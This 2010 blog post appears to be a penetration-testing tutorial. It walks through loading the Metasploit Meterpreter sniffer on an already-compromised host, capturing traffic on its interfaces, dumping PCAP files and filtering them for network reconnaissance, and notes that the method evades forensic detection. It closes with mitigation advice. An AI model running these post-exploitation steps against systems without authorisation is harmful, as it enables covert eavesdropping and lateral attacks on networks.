Saturday, 27 November 2010

Metasploit: Using the Meterpreter sniffer extension to collect remote network traffic

Once an attacker has gained a foot-hold by compromising and initial host, one of the first things he needs do is some basic host and network reconnaissance in order to see "where he is" and "what he can do next".

One of the techniques that could be used, is passive network reconnaissance, i.e. packet-sniffing to "listen" to the victims LAN for interesting traffic. Here we explore how to use a sniffer such as the Metasploit Meterpreter sniffer extension.

Please remember to use these techinques only for legitimate penetration testing, not for malicious purposes. Every action you take has consequences, and you will be heir to the results of your actions.

Broadcast traffic

Several protocols broadcast interesting traffic, and capturing internal LAN  traffic can be very useful to an external attacker, to assist in information gathering and compromising further systems in the "soft underbelly" of the internal LAN.

You can find out a lot about a network by running a network packet sniffer such as wireshark, tshark or tcpdump. However, an external attacker will likely want to keep a low profile so installing an application where it does not exist previously is not a wise idea.

Using the Metasploit Meterpreter sniffer extension means that no additional software is installed, no files are written to disk; everything is stored in memory, and all communications between the attacker and victim are encrypted. (This makes intrusion detection and forensic analysis rather difficult!)

Let's take it as read that the initial host has already been compromised, and pick up from there. We can load the Meterpreter sniffer extension as follows

meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > help

<......>

Sniffer Commands
================

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data to PCAP file
    sniffer_interfaces  Enumerate all sniffable network interfaces
    sniffer_start       Start packet capture on a specific interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet capture on a specific interface

...we can then examine what interfaces we have on the remote victim system. This system has two interfaces (which is interesting in itself) and we go ahead and start the sniffer on the first interface:

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )

meterpreter > sniffer_start 1
[*] Capture started on interface 1 (50000 packet buffer)

During the capture, we can check progress of the collection by issuing a sniffer stats command:

meterpreter > sniffer_stats 1
[*] Capture statistics for interface 1
        bytes: 32178
        packets: 211

...and then dump some traffic:

meterpreter > sniffer_dump 1
[-] Usage: sniffer_dump [interface-id] [pcap-file]
meterpreter > sniffer_dump 1 test1.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 910 packets (137240 bytes)
[*] Downloaded 100% (137240/137240)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test1.pcap
meterpreter > lpwd
/root
meterpreter > sniffer_dump 1 test1b.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 4609 packets (787199 bytes)
[*] Downloaded 066% (524288/787199)...
[*] Downloaded 100% (787199/787199)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test1b.pcap

So, we have downloaded a couple of captures to our /root directory. Let's try the other interface, so see if there is any data there also:

meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_dump 2 test2.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 18 packets (3924 bytes)
[*] Downloaded 100% (3924/3924)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test2.pcap
meterpreter > sniffer_dump 2 test2b.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 296 packets (57775 bytes)
[*] Downloaded 100% (57775/57775)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test2b.pcap


Capturing the data didn't take long at all, as it is a very easy process. Now that we have our pcap network capture files, we can examine them locally at our leisure on the attacker system. This can be done with a nice graphical tool like Wireshark, to filter the traffic and see what we could learn about the remote victim network.

Here we filter Netbios/SMB broadcast traffic to see what systems we can see on the remote network. This is especially good for finding live Windows systems (which are rather noisy on a LAN)



Other filters could be applied to other broadcast traffic such as; address resolution (ARP, RARP), router discovery, routing protocol advertisements, DHCP, AppleTalk, and other broadcast services, such as file and print.

Using these methods, we can gather a list of live IP addresses, address ranges, and machine types, and all this information can be collected before we even start actively scanning the remote network. This keeps a very low profile for targeted attacks.

Mitigation

Once a single system is compromised, it is only a matter of a short amount of time before an attacker can gather enough local information to "pivot" his attack and extend the attack to other local systems.

In secure environments, it is vitally important that every host is secured. This includes virtual hosts, and test systems, as these could also be used as bridgehead to silently sniff, or attack other systems on the internal LAN.

Also, it is important that there is sufficient network segmentation, internal firewalls and limiting of broadcast traffic, to help minimise the damage in the case of a single compromised system.

No comments:

Post a Comment